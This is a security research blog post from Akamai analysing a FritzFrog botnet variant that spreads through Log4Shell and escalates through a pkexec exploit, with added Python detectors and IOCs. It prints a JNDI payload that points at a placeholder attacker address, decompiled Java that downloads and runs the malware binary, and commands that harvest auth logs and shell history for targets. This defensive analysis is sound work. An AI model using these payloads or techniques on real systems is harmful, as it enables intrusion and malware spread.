URL:
https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
Submission: On February 05 via api from DE — Scanned from DE
FROG4SHELL — FRITZFROG BOTNET ADDS ONE-DAYS TO ITS ARSENAL

Written by Ori David
February 01, 2024

Ori David is a Security Researcher at Akamai. His research is focused on offensive security, malware analysis, and threat hunting.

Editorial and additional commentary by Tricia Howard

EXECUTIVE SUMMARY

* The Akamai Security Intelligence Group (SIG) has uncovered details about a new variant of the FritzFrog botnet, which abuses the 2021 Log4Shell vulnerability.
* Over the years we have seen more than 20,000 FritzFrog attacks, and 1,500+ victims.
* The malware infects internet-facing servers by brute forcing weak SSH credentials. Newer variants now read several system files on compromised hosts to detect potential targets for this attack that have a high likelihood of being vulnerable.
* The vulnerability is exploited in a brute-force manner that attempts to target as many vulnerable Java applications as possible.
* The malware now also includes a module to exploit CVE-2021-4034, a privilege escalation in the polkit Linux component. This module enables the malware to run as root on vulnerable servers.
* We have included indicators of compromise (IOCs) and additional mitigation measures in this blog post to assist in the prevention of FritzFrog infection.

BACKGROUND ON FRITZFROG

Akamai is continuously monitoring threats via our global network of sensors, including threats we previously discovered. Among these is the FritzFrog botnet (originally identified in 2020), a sophisticated, Golang-based peer-to-peer botnet compiled to support both AMD- and ARM-based machines. The malware is actively maintained and has evolved over the years by adding and improving capabilities.

FritzFrog has traditionally hopped around by using SSH brute force, and has successfully compromised thousands of targets over the years as a result. Each compromised host becomes part of FritzFrog’s network — it communicates with its infected peers to share information, payloads, and configuration.

Thanks to the consistent upkeep, the malware includes many interesting features in its arsenal, including the additions we’ll discuss in this blog, such as the introduction of Log4Shell exploitation. For example, it attempts to avoid touching the disk to limit detection opportunities, supports communication over TOR, and even has an “AntiVirus” module that kills competing malware.

USING LOG4SHELL AS AN INFECTION VECTOR

Traditionally, FritzFrog relied on SSH brute force as its sole infection vector, but recent versions of the malware now include a new one: Log4Shell exploitation, which in our pond is known as the toadally rad “Frog4Shell”.

The Log4Shell vulnerability was initially identified in December 2021 and triggered an industry-wide patching frenzy that lasted for months. Even today, 2 years later, there are many internet-facing applications that are still vulnerable to this exploit.

Vulnerable internet-facing assets are a serious problem, but FritzFrog actually poses a risk to an additional type of asset — internal hosts.
When the vulnerability was first discovered, internet-facing applications were prioritized for patching because of their significant risk of compromise. In contrast, internal machines, which were less likely to be exploited, were often neglected and remained unpatched — a circumstance that FritzFrog takes advantage of.

As part of its spreading routine, the malware attempts to target all hosts in the internal network. It does so by calling the net__Interface_Addrs standard Go function to identify reachable subnets and target the possible addresses in each of them. In Figure 1, we can see the malware attempting to connect to all the addresses in the local network.

Fig. 1: FritzFrog scanning the local network to identify targets

This means that even if the “high-profile” internet-facing applications have been patched, a breach of any asset in the network by FritzFrog can expose unpatched internal assets to exploitation.

FritzFrog identifies potential Log4Shell targets by looking for HTTP servers over ports 8080, 8090, 8888 and 9000. To trigger the vulnerability, an attacker needs to force the vulnerable log4j application to log data containing a payload (Table 1):

    ${jndi:ldap://<attacker_address>/<payload>}

Table 1: Log4Shell payload example

This payload, which is incorrectly parsed by the vulnerable log4j library, forces the Java application to connect to an LDAP server specified in “attacker_address”, download a Java class from it, and execute it (Figure 2).

Fig. 2: The general Log4Shell exploitation flow

FritzFrog attempts to exploit this vulnerability by injecting the payload through HTTP headers (Figure 3). It does so in an interesting manner — rather than attempting to surgically target a specific HTTP header, FritzFrog targets pretty much all of them.

Fig. 3: FritzFrog Log4Shell exploit embedded inside various HTTP headers

FritzFrog sends the Log4Shell payload in numerous HTTP headers, hoping that at least one of them gets logged by the application.
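Because the payload is sent in many headers of the same request, that repetition is itself a detection signal. The following is an added example, not code from the Akamai post: it parses a raw HTTP request and reports which headers carry the plain JNDI lookup from Table 1 and which callback host they point to. The header names, the threshold of three headers, and the sample requests are constructed assumptions.

```python
import re

# Plain lookup form from the article's Table 1: ${jndi:<scheme>://<host>/<path>}.
# Group 1 is the scheme, group 2 the callback host (with port, if any).
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z]+)://([^/}\s]+)[^}\s]*\}", re.IGNORECASE)
SPRAY_THRESHOLD = 3  # assumption: same callback in 3+ headers counts as a spray


def parse_headers(raw_request):
    """Return [(name, value), ...] from the header block of a raw HTTP/1.x request."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers = []
    for line in head.split("\r\n")[1:]:      # [0] is the request line
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip(), value.strip()))
    return headers


def classify_request(raw_request):
    """Report which headers carry a JNDI lookup and whether it looks sprayed."""
    carriers = {}                            # callback host -> header names
    for name, value in parse_headers(raw_request):
        for match in JNDI_LOOKUP.finditer(value):
            carriers.setdefault(match.group(2).lower(), []).append(name)
    if not carriers:
        verdict = "clean"
    elif max(len(set(n)) for n in carriers.values()) >= SPRAY_THRESHOLD:
        verdict = "sprayed"
    else:
        verdict = "single"
    return {"verdict": verdict, "callbacks": sorted(carriers), "headers": carriers}


# Constructed sample requests (192.0.2.0/24 is a documentation range).
LOOKUP = "${jndi:ldap://192.0.2.10/a}"
SPRAYED = (
    "GET / HTTP/1.1\r\nHost: 10.0.0.5:8080\r\n"
    f"User-Agent: {LOOKUP}\r\nReferer: {LOOKUP}\r\n"
    f"X-Forwarded-For: {LOOKUP}\r\nCookie: session={LOOKUP}\r\n\r\n"
)
SINGLE = f"GET / HTTP/1.1\r\nHost: 10.0.0.5:8080\r\nUser-Agent: {LOOKUP}\r\n\r\n"
CLEAN = "GET /health HTTP/1.1\r\nHost: 10.0.0.5:8080\r\nUser-Agent: curl/8.5.0\r\n\r\n"

if __name__ == "__main__":
    for label, request in (("sprayed", SPRAYED), ("single", SINGLE), ("clean", CLEAN)):
        result = classify_request(request)
        print(label, result["verdict"], result["callbacks"])
```

The callback hosts it returns are the addresses to look for in outbound LDAP and HTTP connections from the targeted server; the pattern matches only the plain lookup form shown on this page.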
This brute force exploitation approach aims to be a generic Log4Shell exploit that can affect a wide variety of applications.

The injected payload seen in Figure 3 makes the application connect back to FritzFrog’s own IP address — the malware hosts its own LDAP server that is used to serve the malicious Java class. Upon execution, the Java class will connect to the attacking machine over HTTP to download the malware binary that is hosted under the name “robots.txt” (Table 2).

    String ff_host_http_server_address = ff_host_http_server_address.trim();
    payload_url = new URL("http://" + ff_host_http_server_address + "/" + ff_username + "/robots.txt");
    payload_url_stream = payload_url.openStream();

Table 2: Decompiled Log4Shell Java payload downloading the FritzFrog binary

The “robots.txt” file is saved under the name “ifconfig”. The Java class will then execute the ifconfig binary and delete the file (Table 3).

    FileOutputStream ff_payload_file = new FileOutputStream(paths[counter] + "ifconfig");
    ff_payload_file.write(var2.toByteArray());
    ff_payload_file.close();
    ff_payload_file_exec = new File(paths[counter] + "ifconfig");
    ff_payload_file_exec.setExecutable(true);
    Process ff_proc = Runtime.getRuntime().exec(paths[counter] + "ifconfig init " + var9 + ":22 " + ff_username + " exploit_log4shell");
    if (ff_proc.waitFor() == 0) {
        ff_payload_file_exec.delete();
        return;
    }

Table 3: Decompiled Log4Shell Java payload executing the FritzFrog binary

Figure 4 illustrates the Log4Shell exploitation flow used by FritzFrog.

Fig. 4: FritzFrog Log4Shell exploit process

SSH TARGET DISCOVERY METHODS

In addition to adding Log4Shell exploitation, FritzFrog also improved its ability to identify targets for its main infection vector — SSH brute force.

While continuing to target randomly generated IP addresses, FritzFrog will now also attempt to identify specific SSH targets by enumerating several system logs on each of its victims.
AUTH LOGS

The Linux auth.log files contain, among other things, information about connections to the machine. FritzFrog targets active clients in the network by scanning these logs and looking for IP addresses. To access the data, the malware executes the following commands:

    cat /var/log/auth*
    zcat /var/log/auth*

These commands will output the content of all the cleartext and compressed log files.

SSH KNOWN HOSTS

When a host connects to a remote SSH server, the connection information is automatically saved to the ~/.ssh/known_hosts file. FritzFrog will extract the addresses of these hosts and target them.

This provides the malware with a list of active and reachable SSH servers. Moreover, since these servers are likely managed by the same owner as the compromised server, they also may share a similar weak password.

HISTORY FILE

All commands that are executed on Linux systems are saved in a special log called the history file. FritzFrog attempts to identify previous ssh and scp connections by executing the following command:

    history | grep -E \"(scp|ssh)\"

FritzFrog will then extract the IP addresses from these commands and target them. Similar to the known_hosts file, this can provide a list of active and reachable SSH servers.

PRIVILEGE ESCALATION

Another change that we observed was the addition of a privilege escalation capability to the malware. On its initial execution, FritzFrog will check the permissions of its process. If the executing user is not root, a function called “main_RunBlasty” will be called (Figure 5).

Fig. 5: FritzFrog determines that the process is not running as root and executes the “main_RunBlasty” function

The “RunBlasty” function begins with the execution of the “which” command — a utility that enables locating the full path of other commands on the system (Figure 6).

Fig. 6: FritzFrog “which” command execution

We can see that the malware attempts to find the location of the pkexec binary.
(Ring any vulnerability-related bells, aka vulneraBELLities?)

The malware then extracts two files that are embedded inside its own executable (Figure 7); the files are stored as strings, which are Base64-encoded gzipped files. The extracted files are called blasty and payload.so.

Fig. 7: Extracting the files embedded in the malware binary

After creating the files, FritzFrog executes blasty — an ELF that was written in C. If we take a look at its code, we see that it is very simple — some interaction with environment variables, followed by the execution of pkexec (Figure 8).

Fig. 8: blasty disassembled code

Searching for these strings immediately leads us to this exploit code for CVE-2021-4034. This vulnerability in the polkit Linux component was disclosed by Qualys in 2022, and could allow privilege escalation on any Linux machine that was running polkit. Since it is installed by default on most Linux distributions, many unpatched machines are still vulnerable to this CVE today.

The exploit works by abusing the fact that pkexec is a SUID program; that is, it runs with root privileges even when executed by a low-privileged user. The vulnerability enables forcing pkexec to load and execute an attacker-controlled library, leading to code execution as root.

Blasty exploits this vulnerability, making pkexec load and execute payload.so. As we can see in Figure 9, this library will set the uid and gid of the process to 0, meaning root, and execute root_update — FritzFrog’s binary.

Fig. 9: payload.so executing FritzFrog as root

Another interesting note is that blasty and payload.so are both compiled for the AMD64 architecture, even for FritzFrog variants that run on ARM. This means that the exploit will fail to run on any machines that don't run on an AMD64 CPU.

DEFENSE EVASION

FritzFrog continues to employ tactics to remain hidden and avoid detection. In particular, it takes special care to avoid dropping files to disk when possible.
We have seen the developers use two Linux features to achieve this: /dev/shm and memfd_create.

/DEV/SHM

The first technique uses the /dev/shm folder (with shm meaning shared memory), which is a directory that is meant to enable efficient communication among different processes on the system (Figure 10). While it seems like a normal filesystem folder, /dev/shm is actually mapped directly to the RAM, and all files created under it never actually touch the disk.

FritzFrog uses this folder to enable fileless execution by writing files and executing them from /dev/shm. To monitor this activity, we can execute the malware and use the inotifywait utility to inspect file operations in /dev/shm. We see that the malware writes several files to this directory; for example, in Figure 8 the malware is seen writing all the pkexec exploit files to /dev/shm before executing them.

Fig. 10: Monitoring FritzFrog file access events to the /dev/shm directory

MEMFD_CREATE

The second technique uses the memfd_create function, described in the man page as follows:

    memfd_create() creates an anonymous file and returns a file descriptor that refers to it. The file behaves like a regular file, and so can be modified, truncated, memory-mapped, and so on. However, unlike a regular file, it lives in RAM.

So, similarly to the previous technique, we get a convenient way to create a file without touching the disk. FritzFrog uses this technique when executing its miner payload (Figure 11) — it writes the payload into an anonymous file created by memfd_create and executes it.

Fig. 11: FritzFrog using memfd_create to write the miner payload into an anonymous file

MITIGATIONS

We recommend the following two mitigation strategies: using network segmentation and detecting the common malware tactics, techniques, and procedures.

1. Network segmentation can limit the potential impact of FritzFrog by preventing lateral movement.
   Software-based segmentation can be a relatively simple solution to spin up that has a long-lasting defensive impact.
2. We have provided a FritzFrog detection script to run on SSH servers that looks for the following FritzFrog indicators:
   a. Running processes named nginx, ifconfig, php-fpm, apache2, or libexec, whose executable file no longer exists on the file system (as seen below)
   b. Listening port 1234

CONCLUSION

The shift in tactics toward exploitation was a major trend for threat actors in 2023 — one-day and zero-day exploits were used extensively and proved to be some of the most effective methods to breach organizations.

FritzFrog’s addition of exploitation capabilities to its arsenal shows a similar shift in this direction. The additional infection vector that abuses the Log4Shell vulnerability and the pkexec exploit module are two additions explored in this blog post that exemplify this shift. We believe that this trend will continue in upcoming FritzFrog versions, and it's likely only a matter of time before additional exploits are added to the malware.

The Akamai SIG will continue to monitor this threat and others like it and publish our findings. To keep up with FritzFrog updates and other security research, you can follow us on X (formerly Twitter).
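The two host indicators listed under Mitigations, together with the /dev/shm and memfd_create execution described under Defense Evasion, can all be read from /proc. The following is an added example, not Akamai's detection script: it assumes the process name is the one in /proc/<pid>/comm, takes the /proc root as a parameter, and ships a constructed sample tree so it runs offline.

```python
import os
import tempfile

# Process names and port taken from the article's Mitigations section.
SUSPECT_NAMES = {"nginx", "ifconfig", "php-fpm", "apache2", "libexec"}
FRITZFROG_PORT = 1234


def scan_processes(proc_root="/proc"):
    """Return [(pid, name, exe, reasons)] for processes matching an indicator."""
    findings = []
    for entry in sorted(os.listdir(proc_root)):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, entry, "comm")) as fh:
                name = fh.read().strip()
            exe = os.readlink(os.path.join(proc_root, entry, "exe"))
        except OSError:
            continue  # kernel thread, exited process, or insufficient rights
        reasons = []
        if name in SUSPECT_NAMES and exe.endswith(" (deleted)"):
            reasons.append("suspect name, executable deleted")
        if exe.startswith("/memfd:"):
            reasons.append("executable is a memfd_create file")
        if exe.startswith("/dev/shm/"):
            reasons.append("executable under /dev/shm")
        if reasons:
            findings.append((int(entry), name, exe, reasons))
    return findings


def listening_ports(proc_root="/proc"):
    """Return the set of TCP ports in LISTEN state (IPv4 and IPv6 tables)."""
    ports = set()
    for table in ("net/tcp", "net/tcp6"):
        try:
            with open(os.path.join(proc_root, table)) as fh:
                rows = fh.readlines()[1:]  # first row is the column header
        except OSError:
            continue
        for row in rows:
            cols = row.split()
            if len(cols) > 3 and cols[3] == "0A":  # 0A is the LISTEN state
                ports.add(int(cols[1].rsplit(":", 1)[1], 16))
    return ports


def build_sample_proc(root):
    """Write a constructed /proc-like tree so the checks can run offline."""
    samples = {
        "101": ("nginx", "/usr/sbin/nginx"),             # ordinary web server
        "202": ("ifconfig", "/tmp/ifconfig (deleted)"),  # indicator (a)
        "303": ("worker", "/memfd:x (deleted)"),         # memfd_create execution
        "404": ("helper", "/dev/shm/helper"),            # /dev/shm execution
    }
    for pid, (name, exe) in samples.items():
        os.makedirs(os.path.join(root, pid))
        with open(os.path.join(root, pid, "comm"), "w") as fh:
            fh.write(name + "\n")
        os.symlink(exe, os.path.join(root, pid, "exe"))  # dangling link is fine
    os.makedirs(os.path.join(root, "net"))
    with open(os.path.join(root, "net", "tcp"), "w") as fh:
        fh.write("  sl  local_address rem_address   st\n"
                 "   0: 00000000:0016 00000000:0000 0A\n"   # listener on 22
                 "   1: 00000000:04D2 00000000:0000 0A\n"   # listener on 1234
                 "   2: 0100007F:04D2 0100007F:9C40 01\n")  # established, ignored


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample_proc(root)
        print(scan_processes(root))
        print("port 1234 listening:", FRITZFROG_PORT in listening_ports(root))
```

On a live host, call `scan_processes()` and `listening_ports()` with the default `/proc` as root so that the `exe` links of other users' processes can be read.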
IOCS

FRITZFROG BINARY
AMD: f77ab04ee56f3cd4845d4a80c5817a7de4f0561d976d87563deab752363a765d
ARM: fb3371dd45585763f1436afb7d64c202864d89ee6cbb743efac9dbf1cefcc291

LOG4SHELL PAYLOAD
52b11d3fa9206f51c601bd85cb480102fd938894b7274fac3d20915eb3af44f8

“BLASTY” PKEXEC EXPLOIT
BLASTY: 85cb8ceda7d2a29bc7c6c96dd279c43559797a624fc15d44da53ca02379afe01
PAYLOAD.SO: 0b95071c657f23d4d8bfa39042ed8ad0a1c1bceb6b265c1237c12c4c0818c248